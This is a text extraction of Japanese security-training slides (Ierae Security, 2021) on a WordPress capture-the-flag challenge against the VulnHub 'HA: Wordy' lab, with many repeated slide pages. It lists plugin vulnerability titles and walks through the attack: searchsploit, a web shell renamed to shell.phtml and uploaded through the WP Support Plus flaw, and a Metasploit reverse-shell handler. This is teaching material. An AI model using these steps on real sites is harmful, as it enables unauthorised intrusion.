[!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
[!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
[!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
[!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload
[!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)
[!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
[!] Title: WP Symposium 13.04 - Unvalidated Redirect
[!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
[!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
[!] Title: WP Symposium <= 15.1 - SQL Injection
[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
[!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
別の方法でReverse Shellを奪取しよう!
- 90. © 2021 Ierae Security Inc. All Rights Reserved. 89
チャレンジ問題
[!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI)
[!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF)
[!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
[!] Title: Mail Masta 1.0 - Multiple SQL Injection
[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
[!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
[!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
[!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
[!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload
[!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)
[!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
[!] Title: WP Symposium 13.04 - Unvalidated Redirect
[!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
[!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
[!] Title: WP Symposium <= 15.1 - SQL Injection
[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
[!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
別の方法でReverse Shellを奪取しよう!
- 91. © 2021 Ierae Security Inc. All Rights Reserved. 90
チャレンジ問題
[!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI)
[!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF)
[!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
[!] Title: Mail Masta 1.0 - Multiple SQL Injection
[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
[!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
[!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
[!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
[!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload
[!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)
[!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
[!] Title: WP Symposium 13.04 - Unvalidated Redirect
[!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
[!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
[!] Title: WP Symposium <= 15.1 - SQL Injection
[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
[!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
別の方法でReverse Shellを奪取しよう!
- 92. © 2021 Ierae Security Inc. All Rights Reserved. 91
チャレンジ問題
[!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI)
[!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF)
[!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
[!] Title: Mail Masta 1.0 - Multiple SQL Injection
[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
[!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
[!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
[!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
[!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload
[!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)
[!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection
[!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS
[!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
[!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
[!] Title: WP Symposium 13.04 - Unvalidated Redirect
[!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
[!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
[!] Title: WP Symposium <= 15.1 - SQL Injection
[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
[!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
別の方法でReverse Shellを奪取しよう!
- 93. © 2021 Ierae Security Inc. All Rights Reserved. 92
チャレンジ問題のヒント
WPScanのReferencesやGoogle検索からExploit Codeを見つけよう!
ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう!
ヒント
- 94. © 2021 Ierae Security Inc. All Rights Reserved. 93
チャレンジ問題のヒント
WPScanのReferencesやGoogle検索からExploit Codeを見つけよう!
ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう!
ヒント
- 95. © 2021 Ierae Security Inc. All Rights Reserved. 94
チャレンジ問題のヒント
WPScanのReferencesやGoogle検索からExploit Codeを見つけよう!
ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう!
ヒント
- 96. © 2021 Ierae Security Inc. All Rights Reserved. 95
チャレンジ問題 Writeup
チャレンジ問題 Writeup
- 97. © 2021 Ierae Security Inc. All Rights Reserved. 96
チャレンジ問題
Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
searchsploit WP Support Plus Responsive
別の方法でReverse Shellを奪取しよう!
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 98. © 2021 Ierae Security Inc. All Rights Reserved. 97
チャレンジ問題
Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
searchsploit WP Support Plus Responsive
別の方法でReverse Shellを奪取しよう!
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 99. © 2021 Ierae Security Inc. All Rights Reserved. 98
チャレンジ問題
Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
searchsploit WP Support Plus Responsive
別の方法でReverse Shellを奪取しよう!
- 100. © 2021 Ierae Security Inc. All Rights Reserved. 99
チャレンジ問題
Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
vim exploit.html
cp shell.php shell.phtml
python3 –m http.server 80
別の方法でReverse Shellを奪取しよう!
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 101. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
msf6 exploit(multi/handler) > options
msf6 exploit(multi/handler) > run
別の方法でReverse Shellを奪取しよう!
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 102. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
http://127.0.0.1/exploit.htmlからshell.phtmlをサーバにアップロード
-> http://<IP Address>/wordpress/wp-content/uploads/wpsp/shell.phtml
別の方法でReverse Shellを奪取しよう!
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 103. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
http://127.0.0.1/exploit.htmlからshell.phtmlをサーバにアップロード
-> http://<IP Address>/wordpress/wp-content/uploads/wpsp/shell.phtml
別の方法でReverse Shellを奪取しよう!
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 104. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
http://192.168.43.13/wordpress/wp-content/uploads/wpsp/
別の方法でReverse Shellを奪取しよう!
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 105. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
http://192.168.43.13/wordpress/wp-content/uploads/wpsp/
別の方法でReverse Shellを奪取しよう!
- 106. © 2021 Ierae Security Inc. All Rights Reserved.
10
チャレンジ問題
Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
http://192.168.43.13/wordpress/wp-content/uploads/wpsp/
別の方法でReverse Shellを奪取しよう!